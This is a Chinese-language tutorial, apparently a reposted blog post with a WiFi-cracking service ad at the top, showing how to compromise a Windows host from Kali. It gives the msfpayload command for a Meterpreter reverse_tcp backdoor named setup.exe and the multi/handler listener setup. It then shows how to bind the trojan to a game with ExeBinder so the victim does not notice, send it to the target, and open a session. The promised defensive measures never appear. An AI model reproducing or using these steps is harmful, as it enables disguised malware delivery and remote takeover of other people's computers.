kali网站实战 Kali渗透Windows服务器

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

kali网站实战

本文首发于“合天网安实验室” 这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。 本次实战环境:Kali渗透Windows服务器 实战步骤一 本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下; 1、 实战步骤一:生成setup.exe后门程序,即木马程序。 (1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。 如下图:

kali网站实战

(2)输入以下命令,使用msfpayload生成名为setup的后门程序: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下图:

kali网站实战kali网站实战

(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。 如下图所示: (4) 终端中输入首先msfconsole;然后输入use exploit/multi/handler来加载 exploit/multi/handler 模块;输入set LHOST 192.168.189.130来设置本地主机;然后输入exploit -z -j开始监听,如下图所示:

kali网站实战

实战步骤二 将上面生成的木马程序与某个软件进行捆绑。 (1)可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件,这样在运行软件时两个软件同时运行,不会引起注意。在tools里面进入名为exekunbang的文件,先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件,默认选择本软件中自带的小游戏程序:

kali网站实战kali网站实战kali网站实战kali网站实战kali网站实战kali网站实战

点击下一步,选择第二个要捆绑的软件,即之前生成的木马程序setup.exe: 点击下一步,选择一个文件要保存的路径: 继续点击下一步,开始捆绑软件: (2) 将捆绑后的软件发送给目标主机。 实战步骤三 检测目标主机,对目标主机进行渗透测试。 (2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。输入sessionss:

kali网站实战

可以看到目标主机的ip为192.168.189.129, (2)再继续输入sessions -i 1,之后可以对目标主机进行一系列的操作。如输入sysinfo可知道目标主机的系统信息;输入 getuid查看对方正在运行的用户。

赞(0)